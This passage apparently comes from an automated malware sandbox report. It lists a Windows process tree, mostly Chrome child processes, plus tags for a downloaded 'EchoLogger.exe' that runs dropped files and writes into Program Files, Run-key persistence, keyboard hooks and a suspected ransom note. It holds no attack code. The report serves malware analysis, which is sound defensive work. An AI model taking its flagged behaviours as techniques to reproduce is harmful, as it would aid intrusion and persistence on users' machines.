  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1796 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:2
  2⤵
  PID:2672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:8
  2⤵
  PID:180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2236 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:8
  2⤵
  PID:4184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3256 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:1
  2⤵
  PID:1728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3240 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:1
  2⤵
  PID:4552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4816 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:1
  2⤵
  PID:1528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5068 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:1
  2⤵
  PID:1948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=5056 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:1
  2⤵
  PID:2668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:8
  2⤵
  PID:3300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:8
  2⤵
  PID:3644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5484 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:1
  2⤵
  PID:3368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6092 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:8
  2⤵
  PID:3540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5488 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:1
  2⤵
  PID:5088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6436 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:8
  2⤵
  PID:5036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=6424 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:1
  2⤵
  PID:3620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=6544 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:1
  2⤵
  PID:2176
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Yeni_Metin_Belgesi.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=7024 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:1
  2⤵
  PID:5008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=6916 --field-trial-handle=1812,i,17908918673585362540,4177452166949483237,131072 /prefetch:1
  2⤵
  PID:784

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Loads dropped DLL
PID:3148
- C:\Windows\system32\mstsc.exe
  "C:\Windows\system32\mstsc.exe"
  2⤵
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:3828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Adds Run key to start application
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5656
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffc2e629758,0x7ffc2e629768,0x7ffc2e629778
    3⤵
    PID:1836
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:8
    3⤵
    PID:1880
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1756 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:2
    3⤵
    PID:2016
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3096 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:1
    3⤵
    PID:2072
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3088 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:1
    3⤵
    PID:2260
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:8
    3⤵
    PID:4468
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4600 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:1
    3⤵
    PID:3752
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4780 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:8
    3⤵
    PID:2156
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4880 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:8
    3⤵
    PID:6064
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5084 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:8
    3⤵
    PID:5376
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5212 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:8
    3⤵
    PID:4480
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5388 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:1
    3⤵
    PID:3620
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3816 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:1
    3⤵
    PID:3760
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5456 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:1
    3⤵
    PID:2620
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=1860 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:1
    3⤵
    PID:2072
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1116 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:8
    3⤵
    PID:1248
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5484 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:8
    3⤵
    PID:3756
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5480 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:1
    3⤵
    PID:5772
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5468 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:1
    3⤵
    PID:1808
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=2736 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:1
    3⤵
    PID:808
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6052 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:8
    3⤵
    PID:5768
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5980 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:1
    3⤵
    PID:4360
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:8
    3⤵
    PID:1076
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:8
    3⤵
    PID:2028
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3956 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5564
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=3932 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:1
    3⤵
    PID:4708
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5348 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:1
    3⤵
    PID:116
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5280 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:8
    3⤵
    PID:4112
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5464 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:8
    3⤵
    PID:4164
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=3404 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:1
    3⤵
    PID:5732
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3308 --field-trial-handle=2016,i,10139207732271026517,17681191579853169617,131072 /prefetch:8
    3⤵
    PID:5544
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\EchoLogger\" -spe -an -ai#7zMap1529:82:7zEvent8551
  2⤵
  PID:4108
- C:\Users\Admin\Downloads\EchoLogger\EchoLogger.exe
  "C:\Users\Admin\Downloads\EchoLogger\EchoLogger.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2340
- C:\Users\Admin\Downloads\EchoLogger\EchoLogger.exe
  "C:\Users\Admin\Downloads\EchoLogger\EchoLogger.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4692
- C:\Users\Admin\Downloads\EchoLogger\EchoLogger.exe
  "C:\Users\Admin\Downloads\EchoLogger\EchoLogger.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:5312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Adds Run key to start application
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of SendNotifyMessage
  PID:2668
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc2e629758,0x7ffc2e629768,0x7ffc2e629778
    3⤵
    PID:4304
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1772 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:2
    3⤵
    PID:2232
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2144 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:3532
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:3972
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3196 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:3448
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3168 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:3792
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4584 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:5576
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4792 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:5184
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4932 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:4192
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:840
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5280 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:4284
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4888 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:4084
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5080 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:3364
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5364 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:3308
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:3284
- - C:\Program Files\Google\Chrome\Application\chrome.exe
